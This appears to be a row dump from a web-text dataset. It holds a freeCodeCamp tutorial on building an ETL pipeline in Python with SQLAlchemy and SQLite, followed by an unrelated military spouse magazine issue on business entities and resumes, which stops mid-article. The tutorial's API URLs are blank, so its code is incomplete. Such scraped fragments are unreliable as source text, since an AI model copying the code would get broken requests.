text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
One of the key aspects of any data science workflow is the sourcing, cleaning, and storing of raw data in a form that can be used upstream. This process is commonly referred to as “Extract-Transform-Load,” or ETL for short.
It is important to design efficient, robust, and reliable ETL processes, or “data pipelines.” An inefficient pipeline will make working with data slow and unproductive. A non-robust pipeline will break easily, leaving gaps.
Worse still, an unreliable data pipeline will silently contaminate your database with false data that may not become apparent until damage has been done.
Although critically important, ETL development can be a slow and cumbersome process at times. Luckily, there are open source solutions that make life much easier.
What is SQLAlchemy?
One such solution is a Python module called SQLAlchemy. It allows data engineers and developers to define schemas, write queries, and manipulate SQL databases entirely through Python.
SQLAlchemy’s Object Relational Mapper (ORM) and Expression Language functionalities iron out some of the idiosyncrasies apparent between different implementations of SQL by allowing you to associate Python classes and constructs with data tables and expressions.
Here, we’ll run through some highlights of SQLAlchemy to discover what it can do and how it can make ETL development a smoother process.
Setting up
You can install SQLAlchemy using the pip package installer.
$ sudo pip install sqlalchemy
As for SQL itself, there are many different versions available, including MySQL, Postgres, Oracle, and Microsoft SQL Server. For this article, we’ll be using SQLite.
SQLite is an open-source implementation of SQL that usually comes pre-installed with Linux and Mac OS X. It is also available for Windows. If you don’t have it on your system already, you can follow these instructions to get up and running.
In a new directory, use the terminal to create a new database:
$ mkdir sqlalchemy-demo && cd sqlalchemy-demo $ touch demo.db
Defining a schema
A database schema defines the structure of a database system, in terms of tables, columns, fields, and the relationships between them. Schemas can be defined in raw SQL, or through the use of SQLAlchemy’s ORM feature.
Below is an example showing how to define a schema of two tables for an imaginary blogging platform. One is a table of users, and the other is a table of posts uploaded.
from sqlalchemy import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker from sqlalchemy.sql import * engine = create_engine('sqlite:///demo.db') Base = declarative_base() class Users(Base): __tablename__ = "users" UserId = Column(Integer, primary_key=True) Title = Column(String) FirstName = Column(String) LastName = Column(String) Email = Column(String) Username = Column(String) DOB = Column(DateTime) class Uploads(Base): __tablename__ = "uploads" UploadId = Column(Integer, primary_key=True) UserId = Column(Integer) Title = Column(String) Body = Column(String) Timestamp = Column(DateTime) Users.__table__.create(bind=engine, checkfirst=True) Uploads.__table__.create(bind=engine, checkfirst=True)
First, import everything you need from SQLAlchemy. Then, use
create_engine(connection_string) to connect to your database. The exact connection string will depend on the version of SQL you are working with. This example uses a relative path to the SQLite database created earlier.
Next, start defining your table classes. The first one in the example is
Users. Each column in this table is defined as a class variable using SQLAlchemy’s
Column(type), where
type is a data type (such as
Integer,
String,
DateTime and so on). Use
primary_key=True to denote columns which will be used as primary keys.
The next table defined here is
Uploads. It’s very much the same idea — each column is defined as before.
The final two lines actually create the tables. The
checkfirst=True parameter ensures that new tables are only created if they do not currently exist in the database.
Extract
Once the schema has been defined, the next task is to extract the raw data from its source. The exact details can vary wildly from case to case, depending on how the raw data is provided. Maybe your app calls an in-house or third-party API, or perhaps you need to read data logged in a CSV file.
The example below uses two APIs to simulate data for the fictional blogging platform described above. The
Users table will be populated with profiles randomly generated at randomuser.me, and the
Uploads table will contain lorem ipsum-inspired data courtesy of JSONPlaceholder.
Python’s
Requests module can be used to call these APIs, as shown below:
import requests url = '' users_json = requests.get(url).json() url2 = '' uploads_json = requests.get(url2).json()
The data is currently held in two objects (
users_json and
uploads_json) in JSON format. The next step will be to transform and load this data into the tables defined earlier.
Transform
Before the data can be loaded into the database, it is important to ensure that it is in the correct format. The JSON objects created in the code above are nested, and contain more data than is required for the tables defined.
An important intermediary step is to transform the data from its current nested JSON format to a flat format that can be safely written to the database without error.
For the example running through this article, the data are relatively simple, and won’t need much transformation. The code below creates two lists,
users and
uploads, which will be used in the final step:
from datetime import datetime, timedelta from random import randint users, uploads = [], [] for i, result in enumerate(users_json['results']): row = {} row['UserId'] = i row['Title'] = result['name']['title'] row['FirstName'] = result['name']['first'] row['LastName'] = result['name']['last'] row['Email'] = result['email'] row['Username'] = result['login']['username'] dob = datetime.strptime(result['dob'],'%Y-%m-%d %H:%M:%S') row['DOB'] = dob.date() users.append(row) for result in uploads_json: row = {} row['UploadId'] = result['id'] row['UserId'] = result['userId'] row['Title'] = result['title'] row['Body'] = result['body'] delta = timedelta(seconds=randint(1,86400)) row['Timestamp'] = datetime.now() - delta uploads.append(row)
The main step here is to iterate through the JSON objects created before. For each result, create a new Python dictionary object with keys corresponding to each column defined for the relevant table in the schema. This ensures that the data is no longer nested, and keeps only the data needed for the tables.
The other step is to use Python’s
datetime module to manipulate dates, and transform them into
DateTime type objects that can be written to the database. For the sake of this example, random
DateTime objects are generated using the
timedelta() method from Python’s DateTime module.
Each created dictionary is appended to a list, which will be used in the final step of the pipeline.
Load
Finally, the data is in a form that can be loaded into the database. SQLAlchemy makes this step straightforward through its Session API.
The Session API acts a bit like a middleman, or “holding zone,” for Python objects you have either loaded from or associated with the database. These objects can be manipulated within the session before being committed to the database.
The code below creates a new session object, adds rows to it, then merges and commits them to the database:
Session = sessionmaker(bind=engine) session = Session() for user in users: row = Users(**user) session.add(row) for upload in uploads: row = Uploads(**upload) session.add(row) session.commit()
The
sessionmaker factory is used to generate newly-configured
Session classes.
Session is an everyday Python class that is instantiated on the second line as
session.
Next up are two loops which iterate through the
users and
uploads lists created earlier. The elements of these lists are dictionary objects whose keys correspond to the columns given in the
Users and
Uploads classes defined previously.
Each object is used to instantiate a new instance of the relevant class (using Python’s handy
some_function(**some_dict) trick). This object is added to the current session with
session.add().
Finally, when the session contains the rows to be added,
session.commit() is used to commit the transaction to the database.
Aggregating
Another cool feature of SQLAlchemy is the ability to use its Expression Language system to write and execute backend-agnostic SQL queries.
What are the advantages of writing backend-agnostic queries? For a start, they make any future migration projects a whole lot easier. Different versions of SQL have somewhat incompatible syntaxes, but SQLAlchemy’s Expression Language acts as a lingua franca between them.
Also, being able to query and interact with your database in a seamlessly Pythonic way is a real advantage to developers who’d prefer work entirely in the language they know best. However, SQLAlchemy will also let you work in plain SQL, for cases when it is simpler to use a pre-written query.
Here, we will extend the fictional blogging platform example to illustrate how this works. Once the basic Users and Uploads tables have been created and populated, a next step might be to create an aggregated table — for instance, showing how many articles each user has posted, and the time they were last active.
First, define a class for the aggregated table:
class UploadCounts(Base): __tablename__ = "upload_counts" UserId = Column(Integer, primary_key=True) LastActive = Column(DateTime) PostCount = Column(Integer) UploadCounts.__table__.create(bind=engine, checkfirst=True)
This table will have three columns. For each
UserId, it will store the timestamp of when they were last active, and a count of how many posts they have uploaded.
In plain SQL, this table would be populated using a query along the lines of:
INSERT INTO upload_counts SELECT UserId, MAX(Timestamp) AS LastActive, COUNT(UploadId) AS PostCount FROM uploads GROUP BY 1;
In SQLAlchemy, this would be written as:
connection = engine.connect() query = select([Uploads.UserId, func.max(Uploads.Timestamp).label('LastActive'), func.count(Uploads.UploadId).label('PostCount')]).\ group_by('UserId') results = connection.execute(query) for result in results: row = UploadCounts(**result) session.add(row) session.commit()
The first line creates a
Connection object using the
engine object’s
connect() method. Next, a query is defined using the
select() function.
This query is the same as the plain SQL version given above. It selects the
UserId column from the
uploads table. It also applies
func.max() to the
Timestamp column, which identifies the most recent timestamp. This is labelled
LastActive using the
label() method.
Likewise, the query applies
func.count() to count the number of records that appear in the
Title column. This is labelled
PostCount.
Finally, the query uses
group_by() to group results by
UserId.
To use the results of the query, a for loop iterates over the row objects returned by
connection.execute(query). Each row is used to instantiate an instance of the
UploadCounts table class. As before, each row is added to the
session object, and finally the session is committed to the database.
Checking out
Once you have run this script, you may want to convince yourself that the data have been written correctly into the
demo.db database created earlier.
After quitting Python, open the database in SQLite:
$ sqlite3 demo.db
Now, you should be able to run the following queries:
SELECT * FROM users; SELECT * FROM uploads; SELECT * FROM upload_counts;
And the contents of each table will be printed to the console! By scheduling the Python script to run at regular intervals, you can be sure the database will be kept up-to-date.
You could now use these tables to write queries for further analysis, or to build dashboards for visualisation purposes.
Reading further
If you’ve made it this far, then hopefully you’ll have learned a thing or two about how SQLAlchemy can make ETL development in Python much more straightforward!
It is not possible for a single article to do full justice to all the features of SQLAlchemy. However, one of the project’s key advantages is the depth and detail of its documentation. You can dive into it here.
Otherwise, check out this cheatsheet if you want to get started quickly.
The full code for this article can be found in this gist.
Thanks for reading! If you have any questions or comments, please leave a response below.
|
https://www.freecodecamp.org/news/sqlalchemy-makes-etl-magically-easy-ab2bd0df928/
|
CC-MAIN-2019-35
|
refinedweb
| 2,027
| 56.15
|
15393/deploy-react-app-to-aws-with-pm2
I am trying to deploy react app to AWS following this tutorial my app is slightly different and when I run pm2 start ecosystem.config.js --env production I get that app status is online but on pm2 show status is errored with the following output: /home/ubuntu/www/react/tools/distServer.js:4
import browserSync from 'browser-sync';
^^^^^^
|| SyntaxError: Unexpected token import
my ecosystem.config.js file looks like this:
module.exports = {
apps : [
{
name: "blockchainwallet",
script: "tools/distServer.js",
watch: true,
env: {
"PORT": 8080,
"NODE_ENV": "development"
},
env_production: {
"PORT": 3000,
"NODE_ENV": "production",
}
}
]
}
could you give me any suggestions in order to fix this bug?
Is it necessary to migrate to .Net ...READ MORE
What you are looking for is eb deploy ...READ MORE
You can try these steps to put ...READ MORE
You can see the detailed information given ...READ MORE
Hey @nmentityvibes, you seem to be using ...READ MORE
It can work if you try to put ...READ MORE
Consider this - In 'extended' Git-Flow, (Git-Multi-Flow, ...READ MORE
When you use docker-compose down, all the ...READ MORE
Get item: key is federatedInfo with options ...READ MORE
refer this link
You can't install the certificates ...READ MORE
OR
Already have an account? Sign in.
|
https://www.edureka.co/community/15393/deploy-react-app-to-aws-with-pm2
|
CC-MAIN-2020-16
|
refinedweb
| 216
| 60.21
|
Update: You can now join our public neo4j-users Slack group, where this extension is installed.Our colleague Andreas, who loves Slack and brought it into our company, suggested the other day that we could build a Slack and Neo4j integration to demonstrate how useful a graph database backend would be. And, of course, how much fun.
Building BlocksAs it was only midnight we, the amazing Nicole and Michael, decided to put something together. We set up a Neo4j 2.2.3 instance in the cloud. Then, we created a Python app for our Slack-Neo4j server and pushed it to GitHub. The application uses
web.pyfor the webapp,
requeststo access the Slack APIs and py2neo to talk to Neo4j. Next we pushed it to Heroku to make it available publicly so that Slack could connect to it. You have to provide environment variables to your Neo4j server, your Slack API token and the team token configured with your slash command. Find the details in the project readme.
Slack Slash CommandWith all that complete, we could then set up a slash command. For our integration, the ideas came from Andreas:
/graph import– import users, channels and membership into Neo4j
/graph cypher MATCH ... RETURN– execute read only cypher statement and return the results
/graph– provide an overview of the data that’s in the database
POSTpayload and checking the team token, we then got the first word of the
textparameter as “command” to dispatch on.
Getting Data from Slack into Neo4jFor the integration with Neo4j we sent Cypher statements to Neo4j using py2neo’s APIs. Example below:
Sending requests to the Slack API with the token and getting the JSON response is straightforward withSending requests to the Slack API with the token and getting the JSON response is straightforward with
from py2neo import Graph graph = Graph(os.environ.get('NEO4J_URL')) graph.cypher.execute("MATCH (u:User)-[:MEMBEROF]->(c:Channel) return u.screenname, c.name")
requests. We then passed the JSON response directly as parameters to a Cypher statement to create the graph structure in Neo4j.
As you can see, we can import users, channels and memberships, easy peasy.As you can see, we can import users, channels and memberships, easy peasy.
res = requests.get("{}".format(token)) query = """ UNWIND {channels} AS channel MERGE (c:Channel {id:channel.id}) ON CREATE SET c.name = channel.name """ graph.cypher.execute_one(query, res.json())
/graph import channels
slackbot: 115 users uploaded. Only you can see this message
/graph import users
slackbot: 117 channels uploaded Only you can see this message
Graph All the Slack ThingsAnd to show you that it worked, here is a graph of our Slack universe:
/graph cypher match (u:User)-->() return u, count(*) as memberships order by memberships desc limit 3` slackbot: | u | memberships ---+--------------------------------------------------------------+------------- 1 | (n200:User {fullname:"Michael",id:"U02HVJ36",username:"mh"}) | 64 2 | (n151:User {fullname:"Chris",id:"U0KLMP5X",username:"cl"}) | 37 3 | (n210:User {fullname:"Philip",id:"U02HDEF0EX",username:"pr"}) | 37
RecommendationsFinally, the biggest surprise of all: We wanted to recommend new channels to people. We used traditional collaborative filtering for this concept of “channels of your colleagues that are not yet your channels”. But we also filter out prolific users and channels so that they don’t distort the picture..
/graph cypher MATCH (c:Channel) with toInt(count(*)*0.618) as channel_cutoff MATCH (u:User) with toInt(count(*)*0.618) as user_cutoff, channel_cutoff MATCH (u:User {username:"laeg"})-[:MEMBER_OF]->(c:Channel) <-[:MEMBER_OF]-(coll:User)-[:MEMBER_OF]->(reco:Channel) WHERE size((c)<--()) < channel_cutoff AND size((reco)<--()) < channel_cutoff AND size((coll)-->()) < user_cutoff AND NOT (u)-[:MEMBER_OF]->(reco) RETURN reco.name, count(*) AS freq ORDER BY freq DESC LIMIT 5; slackbot: | reco.name | freq --+---------------------+------ 1 | feedback | 218 2 | dev-team | 179 3 | sales_marketing | 161 4 | marketing | 142 5 | cypher-the-language | 125
Keywords: cypher graph database heroku json neo4j open source graph database py2neo slack slack api slack integration slash command
[…] course we added our Neo4j-Slack integration so that you can explore channels and users and get recommendations on channels that might be […]
1 Trackback
Upcoming Event
Have a Graph Question?
Reach out and connect with the Neo4j staff.Stack Overflow
Slack
Share your Graph Story?
just awesome guys, Im a heavy user of Neo4j and Slack. This combination es a match made in heaven. Im gonna take a look at the repo..
|
https://neo4j.com/blog/the-neo4j-slack-integration-youve-been-waiting-for-is-here/
|
CC-MAIN-2018-34
|
refinedweb
| 723
| 62.38
|
If you follow this idiom, there’s no need to interact with NavControllers at all.
- Okay, but anyway setting with NavControllers (setRoot) should not work?
- I will analyze the link you provided me, to study how to do so.
I know I am late to the party, and this is a few months old already.
But I think the code you are looking for is to access the root nav from the App utility class () using
getRootNav() and
pop() from there.
Ionic Tabs have a strange navigation stack (it’s not so strange when you think why). The
<ion-tabs> instance is pushed to the root nav, and each
<ion-tab> has its own NavController. This is so you can push as deep as you need to per tab, and simply switch to another tab without screwing up the other tab’s navigation stack.
Essentially what you want to do is this on one of your pages:
logout() { this.app.getRootNav().pop(); }
The
<ion-tabs> is pushed to the root navigation stack, and each tab’s individual navigation stack is a child to this, so is not part of the root. Make sense?
Not to me. I want each element of my app to be independent, with clearly defined boundaries for interaction. Having arbitrary pages mess with the app component’s nav stack breaks that contract, so I consider it flawed design.
Unfortunately, I cannot answer for the design decisions.
As for the alternative solution. I agree - I suppose it depends on how you want to handle your navigation stack. I tend to avoid interacting with the root page unless I am initialising the app, since you don’t get the advantages built into the NavController.
import { App } from ‘ionic-angular’;
import this where ur logout function is.
constructor(public appCtrl: App){}
add to contraller .
this.appCtrl.getRootNav().setRoot(LoginPage);
}
use this and it will work.
That works for me. Ionic 3
Also works at Ionic 3. thank you
Whats up man!
It works for me!
I’m using Ionic 3
Thanks !
Awesome
works, ionic 2
Muito obrigado, Deu tudo certo
In your AppComponent.ts:
import { Component } from '@angular/core'; import { Config, Nav, Platform } from 'ionic-angular'; import { AuthService, ServiceWorkerService, LoggerService } from '@core/index'; @Component({ templateUrl: 'app.component.html' }) export class AppComponent { // [root]="rootPage" public rootPage: any = 'LoadingPage'; // [class]="theme" public theme: String = 'orange-theme'; constructor(public config: Config, public platform: Platform, private authService: AuthService, private swService: ServiceWorkerService, private logger: LoggerService) { this.initialiseApp(); } private initialiseApp() { this.platform.ready().then(() => { this.swService.run(); }); this.authService.afAuth.authState.subscribe(user => { if (user) { this.rootPage = 'TabsPage'; } else { this.rootPage = 'SignInPage'; } }, () => { this.rootPage = 'SignInPage'; } ); } }
app.component.html:
<ion-nav [root]="rootPage" [class]="theme"></ion-nav>
Hi@IonBruno
My suggestion is you have to use
import { App } from ‘ionic-angular’; this.appCtrl.getRootNav().setRoot(LoginPage); instead of this.navCtrl.setRoot(LoginPage);
Thank you it work for me
thx dude, this works for ionic 3 latest
using this this.appCtrl.getRootNav().setRoot(LoginPage); working fine in ionic 3,
but it hiding my side menu
Please select this as the answer as it works perfectly
thanks a lot, that helps
Hi, how you fix this?
Hi,Thanks Its working with ionic 5
|
https://forum.ionicframework.com/t/pop-tabspage-and-push-loginpage/78716/13?u=shaileshbappanadu
|
CC-MAIN-2020-45
|
refinedweb
| 535
| 58.89
|
Download presentation
Presentation is loading. Please wait.
Published byEmily Harmon Modified over 5 years ago
2
ISAAC NEWTON (1642 – 1727) The rate of acceleration due to gravity at the Earth’s surface was proportional to the Earth’s gravitational force on the Moon. The Earth’s gravitational force on the moon was inversely proportional to the square of the Earth’s distance from the moon. F g 1/r 2
3
LAW OF UNIVERSAL GRAVITATION F g = G (m 1 m 2 ) / r 2 m 1 and m 2 = masses of the 2 objects (kg) r = center-to-center distance between the objects G = universal gravitational constant G = 6.67 x 10 -11 N m 2 / kg 2
4
HENRY CAVENDISH (1731- 1810) 1798: Using a torsion balance, Cavendish measured the gravitational attraction between small objects, and calculated the value of the Universal Gravitational Constant.
5
Gravity Near Earth’s Surface The force of gravity is the weight of the object. Near Earth’s surface, F g = G (m m E ) / r E 2 = mg G (m E ) / r E 2 = g The mass of the Earth can be calculated from this: m E = g r E 2 / G
6
Gravity Near Earth’s Surface The value of g on Earth can vary due to: –Elevation and latitude (distance from center of Earth) –Variations in densities of rock. This may indicate the presence of mineral or oil deposits. These variations are small, but can be measured with a gravimeter
7
Satellites Satellites are placed in orbit by “throwing” them with enough velocity that they fall around the earth.fall around the earth. –If you give it enough speed, a satellite will escape, never to return (escape speed).
8
TYCHO BRAHE (1546 - 1601) Danish astronomer. Became astronomer to the King of Denmark, and made highly detailed observations of planetary movements for over 20 years.
9
JOHANN KEPLER (1571 - 1630) German mathematician 1609: Kepler publishes a book which describes the motion of the planets. – Kepler’s 1 st Law: Planets move around the sun in elliptical orbits, with the sun at one focus.
10
JOHANN KEPLER (1571 - 1630) Kepler’s 2 nd Law: A straight line connecting the sun and a planet sweeps out equal areas in equal time intervals.
11
JOHANN KEPLER (1571 - 1630) Kepler’s 3 rd Law: The ratio of the squares of the periods T of any two planets revolving around the Sun is equal to the ratio of the cubes of their mean distances s from the Sun. (T 1 /T 2 ) 2 = (s 1 /s 2 ) 3 Kepler’s 3 rd law applies to any two bodies orbiting a common center.
12
Kepler’s Laws and Newton’s Synthesis Newton was able to show that: –Kepler’s Laws could be derived from universal gravitation and the laws of motion –Only an inverse-square relationship for gravitation would explain Kepler’s laws. Deviations in the orbits predicted by Kepler’s laws (perturbations) can be used to locate undiscovered planets.
13
Types of Forces in Nature Four fundamental forces: –Gravitational –Electromagnetic –Strong nuclear –Weak nuclear Physicists have unified the electromagnetic and the weak nuclear forces (electroweak force), but still seek a Grand Unified Theory Everyday forces are due to electromagnetic and gravitational forces.
Similar presentations
© 2021 SlidePlayer.com Inc.
|
https://slideplayer.com/slide/6838761/
|
CC-MAIN-2021-21
|
refinedweb
| 551
| 55.58
|
A python program that I'm debugging has the following code (including print statements for debugging):
print
print "BEFORE..."
print "oup[\"0\"] = " + str(oup["0"])
print "oup[\"2008\"] = " + str(oup["2008"])
print "oup[\"2009\"] = " + str(oup["2009"])
oup0 ...
errors = int(0)
for i in range(len(expectedData)):
if data[i] != expectedData[i]:
errors += int(binary_compare(data[i], expectedData[i]))
return errors
I'm trying to get a value from a variable inside some files, here is the code:
path = '/opt/log/...'
word = 'somevariable'
def enumeratepaths(path=path):
paths = []
for ...
problem with a int variable by ChiCotje Tue Dec 09, 2008 2:35 am hello, I have a little problem with my code. The code is a simple textinput dialog (textCntrl). With the wx.Choice option you can influence the variabel that you fill in the TextCntrl. It happens at the "def OnButtonOK" function. So I want to influence the variable "timeInterval" ...
you're searching for something like? S2 = 0 S3 = 0 ... to define a variable with the name 's' + number? you can use 'exec' string = 's%i=current_server' % number exec string but I wouldn't recommend that. It's clearer (for me, at least) to use an auxiliary dictionary. You can set it up and actually ask for the defined keys. ...
num1 = 0 num2 = 1 count = 1 logfile = open('test.log', 'a') logfile.write('Fibinacci') while count < 100: num3=num1+num2 print(num3) logfile.write(num3) num1=num2+num3 print(num1) logfile.write(num1) num2=num1+num3 ...
hello, I want to replace integers for 0 and 1 with a cutoff value. For example: 0,21 0,45 0,78 cut off value: 0,30 0 1 1 The problem is that i don't know what the integers are. The user of my program is able to give the input (by raw_input) . So i can't use the replace(old, new) function. Is there ...
|
http://www.java2s.com/Questions_And_Answers/Python-Data-Type/integer/variable.htm
|
CC-MAIN-2013-20
|
refinedweb
| 314
| 69.38
|
On Wed, Mar 19, 2008 at 11:16:32PM -0700, Dave Leskovec wrote: > This patch adds the start container support. A couple new source files are > added - lxc_container.h and lxc_container.c These contain the setup code that > runs within the container namespace prior to exec'ing the user specified init. IMHO there's too much forking going on here. With the stateful driver we should have the daemon be the parent of the forked VM as per the QEMU driver. This will avoid the need to unsafely re-write the config files. It will also enable errors during the domain creation process to be correctly propagated back to the caller. eg, when I tested this patch 'mount' failed, but the libvirt driver still thought all we fine becasue this part of domain creation was being done in the double-fork()d child and thus no errors could be propagated :|
|
https://www.redhat.com/archives/libvir-list/2008-March/msg00224.html
|
CC-MAIN-2016-22
|
refinedweb
| 150
| 72.46
|
NMSN MAGAZINE
November 5, 2015, Vol. 2, Issue 2
Register NOW for the
5th Annual Military Spouse Summit November 13-14
Springfield, VA
Register online at
MILSPOUSESUMMIT.COM
• COMMON BUSINESS ENTITIES • THE MORE YOU KNOW • A CONVERSATION WITH PAM ALLEN • UTILIZING BLOGGERS
TA B L E
OF
CONTENTS 3
PRESIDENT’S LETTER
4
MEET THE EXPERTS
8
COMMON BUSINESS ENTITIES
12
GETTING IT “WRITE” ON YOUR RESUME
14
THE HOUSE IS MESSIER AND I DON’T CARE
20
FIRST IMPRESSIONS DO MATTER
23
PUT YOUR BEST FOOT FORWARD
25
THE MORE YOU KNOW
29
TRANSITION
32
USE YOUR B.R.A.I.N.
34
WORKING WITH HEAD HUNTERS
38
UTILIZING BLOGGERS
40
THEN AND NOW: A CONVERSATION WITH PAM ALLEN
Sue Hoppin
Rachel Brenke
Janet Farley, Ed.M.
Carol Fishman Cohen Joyce Neave
Amy Schofield, ACRW Matt Zemon Sue Hoppin
Carol Bowser, JD Julie Waters Greta Perry
Shelley Kimball
Visit us online at About Us | Join Today | Editorial | Advertise No part of this publication can be reproduced, stored or transmitted the written permission of the Publisher. 2 in any form without
By now everyone’s settled the kids in school and schedules are starting to normalize somewhat. The back to school rituals are well on their way. It’s time to start thinking about YOU and your goals! As parents, we’re quick to prioritize everyone else ahead of ourself. Don’t do this. Your goals and ambitions are just as important as everyone else’s needs.
Sue Hoppin
Spend some time thinking about your personal and professional goals. Write them down and start chipping away at them. Otherwise, you’re going to turn around one day and realize that 5, 10, 20 years have passed and you’re in the position of cobbling together that resumé and trying to figure out how to break into the workforce. If you take little steps along the way, you’re going to put yourself in a much better position to re-launch your career when you’re ready to work outside the home full time. Our experts are prolific writers on this subject, but if I had to boil down their advice and insights into 5 tips, this is where I would start: • Keep your resumé and LinkedIn profile updated at all times. You never know when opportunity will present itself and you want to be ready. • Take advantage of opportunities to fill in your resumé gaps whether it’s through strategic volunteering or part time jobs that develop skills and knowledge that you may need to round out your resumé. • Join organizations to affiliate with like minded people and keep up with trends in your field. • Set goals and write them down. At least once a year, take a look at those goals and adjust them as needed to reflect your long term goals and ambitions. • Never stop learning. Attend networking events and take advantage of professional development opportunities to grow and stay current in your field. To the last point, if you’re in the DC area or close by, I hope you’ll join us at our 5th Annual Military Spouse Career Summit. Whether you’re a volunteers, job seeker, entrepreneur or just a milspouse looking to network with other career minded military spouses, this is the event for you. We always have a great mix of military spouses married to currently serving, veteran AND retired servicemembers, as well as a positive environment, so it’s a fun way to hone your skills, gain some new insights and expand your professional network. This year, we’re thrilled to be joined by Katherine Berman and Sophie LaMontagne, the co-founders of Georgetown Cupcake. They’ll be sharing their business experiences and lessons learned then sticking around for a cupcake reception/meet and greet. It’s sure to be a great time. We hope to see you there! For more information or to register, check out: milspousesummit.com. Hope to see you there! Connect with us on Facebook /NMSNetwork and on Twitter @NMSNetwork Visit us online at
3
MEET
THE
EXPERTS
SUE HOPPIN Sue Hoppin is the founder and president of the National Military Spouse Network, a consultant on military family issues and the coauthor.
CAROL BOWSER.
Visit us online at
4
RACHEL BREN: Disclaimer: I am a lawyer but I’m not your lawyer! View my entire disclaimer HERE.
CAROL FISHMAN COHEN Carol Fishman Cohen is a globally recognized expert on careerreentry strategy. She is co-author of Back on the Career Track: A Guide for Stay-at-Home Moms Who Want to Return to Work and co-founder of iRelaunch (),.
JANET FARLEY Janet Farley serves as a NMSN subject matter expert and she is the author of The Military Spouse’s Employment Guide: Smart Job Choices for Mobile Lifestyles (Impact Publications, 2012). For more military spouse employment tips and thoughts, follow her @ Smartjobchoices on Twitter.
Visit us online at
5
JOYCE NEAVE.
GRETA PERRY.
AMY SCHOFIELD Amy Schofield, founder of Schofield Strategies [http:// schofieldstrategies.com/], works one”. []
Visit us online at
6
JULIE WATERS.
MATT ZEMON.
Visit us online at
7
COMMON
Business Entities by Rachel Brenke
When running a business, it is important (and cost effective) to spend time establishing a solid infrastructure for your business. This means understanding applicable laws, identifying risks, and setting policies and procedures. A qualified business attorney can advise you on best practices for your business. There are several types of business entities, which are commonly used for business formation.
will set your business up for success!
SOLE PROPRIETORSHIP A Sole Proprietorship is a one-owner business, created at a county or city level, that does not have a formation separate from their personal individual. Sole Proprietors are the default structure when formation documents are not filed but business owners are engaged in business. This type of structure is typically filed on a personal income tax return and a Schedule C. This structure has no liability protection shield between personal and business assets but is the easiest and cheapest way to form a business.
The choice of entity depends on your objectives and the tax and legal aspects of the entity -Â set aside some time (and funds) to review your goals with your legal and tax teams before launching and you Visit us online at
8
PARTNERSHIP. Partnerships can be default created by action as a operation of law but should always be accompanied with partnership agreements to outline all responsibilities, monies, debts and other important details.
Don’t avoid taking the legal bull by the horns simply because you are unaware of the process.
CORPORATION The corporation is considered to be a separate legal person under the law. It is run by a board of directors who appoint officers to run the day to day business affairs. It is owned Visit us online at
9
level and then at the shareholder level if dividends are paid). Because it has been in existence for over 50 years, the rules and regulations enacted by Congress and the IRS are complex.
corporate veil”). If the business will have multiple owners it is best to have a lawyer set up the LLC property and accompany the formation with an operating agreement to manage possibilities such as death, retirement, divorce and conflict. LLC’s also have the benefit of being filed on a personal income tax return (1040 Schedule C) like a Sole Proprietorship but have the option to elect a Corporation taxation through the IRS for additional tax benefits without the corporation administrative duty requirements..”
HOW TO CHOOSE? Choosing a structure for your business may be a difficult decision but is not one to avoid simply because it is overwhelming. The first step is to examine the structures provided above and ask yourself the following questions: What is my financial budget for formation? How important is liability protection to my business and the nature of the business? What is my long-term goal with the business?
Corporation structures are more time and administrative intensive that other types of business but can bring great tax benefits depending on specific business situations.
These questions will help to shape your business formation plan. A small business attorney can help you work through your plan and liability protection desires, while a Certified Public Accountant (CPA) can weigh in on the tax benefits for your specific tax situation.
LIMITED LIABILITY COMPANY The best, and most popular, form of business entity is usually the limited liability company. It is taxed like a partnership (no double taxation – see above), is very flexible, and has legal advantages that are not available to corporations (e.g. no “piercing of the Visit us online at
Business formation may be overwhelming, but legally required and an important process to running a business. Don’t avoid
10
taking the legal bull by the horns simply because you are unaware of the process. Professionals are available to assist you in your business decisions but always be sure to communicate fully your intentions and long-term goals to reach the best decision with these professionals as possible.
Visit us online:. com/meet-rachel-the-law-tog/ Disclaimer: I am a lawyer but I’m not your lawyer! View my entire disclaimer HERE.
11
GETTING IT “WRITE” ON
Your Resume
by Janet Farley, Ed. M.
There are things in life we like to do such as spending quality time with our families travelling to new and exciting places and spending hours shopping when everything is on sale and everything fits us.
write on your resume. Pun intended.
IT LIVES Before you launch into edit mode, accept one reality about your resume. It lives. It is not a static document that you review every few years when it suits you.
Then there are those things in life we don’t exactly like to do, like PCS every few years or hear a doctor say, “this won’t hurt a bit”. Somewhere on that list of things we don’t exactly like to do has to be spending countless hours updating our resumes for new jobs.
Your resume is a living, breathing document that you take good care of so it can take good care of you when time is short and opportunities are present. This means you need to give it more than a passing thought on a fairly regular basis.
In the name of enhancing your time management skills and in landing the job you really want, let’s discuss how to get it Visit us online at
Best suggestion? Pick a schedule, any
12
schedule and stick to it.
see an obvious fit or not? Look critically at your resume as though you were the employer. Would you hire you?
For example, make a pact with yourself to review your resume every year on the day after your birthday. Or plan to review it every six months. Whatever you decide, be consistent and have it on your calendar as a must do item.
Enhance the fit. Assuming you are not already a perfect match for the job on paper, then work to get as close to that point as you can, skill by skill.
You owe it to yourself. Within the scope of one year, your skills have grown. You have new professional experiences that need to be captured on your resume if you intend to remain competitive.
Let’s say you are applying for a budget analyst job but you’ve never been a budget analyst. You have, however, worked in job where you had some significant fiscal responsibilities.
You’ll realize the true benefit of routine maintenance when you want to apply for a job and you don’t need to spend an insane amount of time updating your resume.
Your mission, then, becomes showing how what you have done in those other jobs is akin to what you can do in relationship to the job you want.
TARGETING YOUR RESUME FOR A SPECIFIC JOB
For example, the job vacancy announcement says you have to be able to develop and coordinate budget submissions and justifications. Maybe you didn’t do that every single day in past jobs, but you did do it or something like it annually in one of them. Expand upon that point in the appropriate work narrative.
You have found the perfect job and now all you have to do is convince the employer to give you an interview. A killer resume, targeted specifically to that job, may well be just what you need to make that interview a reality.
To effectively update your resume and target it to the job you want, repeat that process for every skill desired by the employer.
Gather all the information you possibly can about the job you want. What skills are they seeking? Credentials? Experiences? Highlight those keywords you see in the announcement. You may even know someone on the inside who can offer you unpublished details.
You will either be able to directly or indirectly address the skills or not. Whatever you write in an effort to show the fit to an employer, be able to back it up 100%.
Compare the job you want with the content on your existing resume. Do you Visit us online at
13
Throw the thesaurus away. Don’t reach for fancy words. Use the same ones that are used in the job vacancy announcement or within that industry to show your familiarity with the career field, assuming you have it.
